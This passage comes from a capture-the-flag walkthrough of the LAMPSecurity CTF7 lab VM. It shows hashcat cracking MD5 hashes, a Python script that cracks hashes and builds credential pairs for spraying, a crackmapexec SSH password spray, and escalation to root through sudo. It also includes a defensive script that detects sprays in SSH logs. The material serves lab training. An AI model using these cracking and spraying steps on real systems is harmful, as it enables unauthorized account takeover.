* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 2913/5891 MB (1024 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.lst
Time.Started.....: Fri Sep 27 14:46:20 2024 (4 secs)
Time.Estimated...: Fri Sep 27 14:46:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4226.1 kH/s (0.12ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 8/12 (66.67%) Digests (total), 8/12 (66.67%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 29%
Started: Fri Sep 27 14:46:18 2024
Stopped: Fri Sep 27 14:46:25 2024
Clean the cracked passwords into password.lst. hashcat.result here holds the hash:plaintext lines saved from the run; hashcat -m 0 hash.lst --show prints the same pairs from the potfile (run it with the same sudo so it reads the same potfile).
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hashcat.result
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
e22f07b17f98e0d9d364584ced0e3c18:my2cents
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}'
madrid
changeme
qwer1234
test
chuck33
turtles77
somepassword
my2cents
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat hashcat.result| awk -F ':' '{print$2}' > password.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat password.lst
madrid
changeme
qwer1234
test
chuck33
turtles77
somepassword
my2cents
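As an added example (not part of the original writeup), here is the whole cleaning-and-cracking pipeline above in one Python script: it parses the rows as pasted from the mysql client, checks that the digests look like unsalted MD5, runs a dictionary attack with hashlib, and then pairs each cracked password with its own user so that the SSH spray that follows can start with the most likely combinations before trying the full cross-product. The table rows and the tiny wordlist are constructed inline from values shown on this page; in practice you would feed it creds.lst and rockyou.txt.

```python
"""
Added example, not code from the original writeup: clean the mysql dump,
crack the unsalted MD5 hashes, and order the credential pairs for spraying.
"""
import hashlib
import re

# Constructed sample: rows as pasted from the mysql client (values from this page).
CREDS_DUMP = """\
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
"""

# Constructed mini wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "madrid", "changeme", "test", "my2cents", "letmein"]

# One table row: "| <address> | <32 hex chars> |". Header and separator rows won't match.
ROW_RE = re.compile(r"^\|\s*(\S+)\s*\|\s*([0-9a-fA-F]{32})\s*\|\s*$")


def parse_dump(dump):
    """Return [(login, hash)] from the pasted rows; the login is the local part
    of the address, which is what the page uses as the SSH user name."""
    rows = []
    for line in dump.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        email, digest = m.groups()
        rows.append((email.split("@", 1)[0], digest.lower()))
    return rows


def looks_like_md5(digest):
    """32 lowercase hex chars, no salt or prefix: consistent with raw MD5 (hashcat -m 0)."""
    return re.fullmatch(r"[0-9a-f]{32}", digest) is not None


def crack_md5(hashes, wordlist):
    """Dictionary attack on unsalted MD5: hash each candidate once and look it up
    against every target at the same time. Returns {hash: plaintext} for hits."""
    wanted = set(hashes)
    found = {}
    for word in wordlist:
        d = hashlib.md5(word.encode()).hexdigest()
        if d in wanted:
            found[d] = word
            if len(found) == len(wanted):
                break
    return found


def build_spray(rows, cracked):
    """Pairs to try first: each user with the password that hashed to their own
    row (web-to-SSH password reuse is what works on this box). Then the full
    cross-product of users and cracked passwords for everything else."""
    own = [(u, cracked[h]) for u, h in rows if h in cracked]
    passwords = sorted(set(cracked.values()))
    users = [u for u, _ in rows]
    full = [(u, p) for u in users for p in passwords if (u, p) not in own]
    return own, full


def run(dump=CREDS_DUMP, wordlist=WORDLIST):
    rows = parse_dump(dump)
    assert all(looks_like_md5(h) for _, h in rows), "expected raw MD5 digests"
    cracked = crack_md5([h for _, h in rows], wordlist)
    own, full = build_spray(rows, cracked)
    return rows, cracked, own, full


if __name__ == "__main__":
    rows, cracked, own, full = run()
    print(f"{len(cracked)}/{len(rows)} hashes cracked")
    for user, password in own:
        print(f"try first: {user}:{password}")
    print(f"{len(full)} more combinations for the full spray")
```

With the sample above it reports 4/5 hashes cracked and lists brian:my2cents among the pairs to try first; brian reusing his web password for SSH is exactly what the spray below lands on.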
Try the usernames and passwords against SSH
Trying them one by one is slow; a tool is more efficient.
crackmapexec is mostly used in Active Directory engagements; here it just does a simple SSH spray. --continue-on-success keeps it going after the first hit so every valid pair is found. On a real target, check the lockout policy before spraying like this.
Its output looks like the following; grep the lines containing [+] to pick out the successes.
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH 192.168.50.156 22 192.168.50.156 [*] SSH-2.0-OpenSSH_5.3
SSH 192.168.50.156 22 192.168.50.156 [-] brian:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:turtles77 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] brian:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [+] brian:my2cents
SSH 192.168.50.156 22 192.168.50.156 [-] john:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:turtles77 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] john:my2cents Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [+] alice:turtles77
SSH 192.168.50.156 22 192.168.50.156 [-] alice:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] alice:my2cents Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:qwer1234 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:turtles77 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:somepassword Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] ruby:my2cents Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:madrid Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:changeme Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [+] leon:qwer1234
SSH 192.168.50.156 22 192.168.50.156 [-] leon:test Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:chuck33 Authentication failed.
SSH 192.168.50.156 22 192.168.50.156 [-] leon:turtles77 Authentication failed.
Using grep to make the output easier to read
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo crackmapexec ssh 192.168.50.156 -p password.lst -u users.lst --continue-on-success | grep '+'
SSH 192.168.50.156 22 192.168.50.156 [+] brian:my2cents
SSH 192.168.50.156 22 192.168.50.156 [+] alice:turtles77
SSH 192.168.50.156 22 192.168.50.156 [+] leon:qwer1234
SSH 192.168.50.156 22 192.168.50.156 [+] julia:madrid
SSH 192.168.50.156 22 192.168.50.156 [+] michael:somepassword
SSH 192.168.50.156 22 192.168.50.156 [+] charles:chuck33
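A defender-side example, added here and not part of the original writeup: the spray above leaves a distinctive trail in the target's sshd log (one source, many accounts, seconds apart, then a few "Accepted" lines). The script below parses constructed auth.log lines that mimic that run (the year for the syslog timestamps is assumed, since syslog omits it) and flags any source that tries at least min_users distinct accounts within a short window, listing the accounts it then logged into.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log lines (not captured from the target), mimicking the spray
# above: one source tries many accounts within seconds and gets in as three users.
SAMPLE_LOG = """\
Sep 27 14:50:01 bogon sshd[2101]: Failed password for brian from 192.168.50.147 port 40110 ssh2
Sep 27 14:50:01 bogon sshd[2103]: Accepted password for brian from 192.168.50.147 port 40112 ssh2
Sep 27 14:50:02 bogon sshd[2107]: Failed password for john from 192.168.50.147 port 40118 ssh2
Sep 27 14:50:02 bogon sshd[2109]: Failed password for alice from 192.168.50.147 port 40120 ssh2
Sep 27 14:50:03 bogon sshd[2111]: Accepted password for alice from 192.168.50.147 port 40122 ssh2
Sep 27 14:50:03 bogon sshd[2113]: Failed password for invalid user ruby from 192.168.50.147 port 40124 ssh2
Sep 27 14:50:04 bogon sshd[2115]: Failed password for leon from 192.168.50.147 port 40126 ssh2
Sep 27 14:50:05 bogon sshd[2117]: Accepted password for leon from 192.168.50.147 port 40128 ssh2
Sep 27 14:55:00 bogon sshd[2201]: Failed password for admin from 192.168.50.1 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_events(log_text, year=2024):
    """Yield (ts, result, user, src) per sshd password event; syslog has no year."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # unrelated syslog lines are skipped
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def detect_spray(log_text, min_users=3, window_seconds=300):
    """Return {src: summary} for sources trying >= min_users accounts in the window."""
    per_src = defaultdict(lambda: {"users": set(), "failed": 0, "ok": [], "t": []})
    for ts, result, user, src in parse_events(log_text):
        s = per_src[src]
        s["users"].add(user)
        s["t"].append(ts)
        if result == "Failed":
            s["failed"] += 1
        else:
            s["ok"].append(user)  # success amid a spray = likely compromised account
    findings = {}
    for src, s in per_src.items():
        span = (max(s["t"]) - min(s["t"])).total_seconds()
        if len(s["users"]) >= min_users and span <= window_seconds:
            findings[src] = {"users": len(s["users"]), "failed": s["failed"],
                             "accepted": sorted(set(s["ok"])), "span": span}
    return findings
```

Calling detect_spray(SAMPLE_LOG) flags 192.168.50.147 only; the single failure from 192.168.50.1 stays below the distinct-account threshold.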
User brian has (ALL) ALL sudo rights, a very high level of privilege.
mysql> exit
exit
Bye
bash-4.1$ su brian
su brian
Password: my2cents
[brian@bogon inc]$ whoami
whoami
brian
[brian@bogon inc]$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for brian: my2cents
Matching Defaults entries for brian on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brian may run the following commands on this host:
(ALL) ALL
Getting root
[brian@bogon inc]$ sudo /bin/bash
sudo /bin/bash
[root@bogon inc]# whoami
whoami
root
[root@bogon inc]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
inet6 fe80::20c:29ff:fe9d:12a9/64 scope link
valid_lft forever preferred_lft forever
[root@bogon inc]#
Summary
Host scan: the ports of interest are 80 and 8080.
Brute-force the directories on port 80 with dirb; port 80 hosts a CMS.
Port 8080 is the CMS admin backend; log in with an SQL injection universal password (authentication bypass).
Upload a reverse shell through the backend; the upload location is found in the asset directory discovered during directory brute-forcing.
After Kali receives the shell, upgrade it to a full TTY with python.
Continue gathering information on the host and find the database connection configuration file.
Enter the database with mysql; the account is root with an empty password.
Find the users table in the website database and obtain the usernames and password hashes.
Use crackmapexec for password spraying, switch to user brian, and check the current account's privileges with sudo -l.
Use sudo /bin/bash to start a bash process as the administrator and obtain root.
End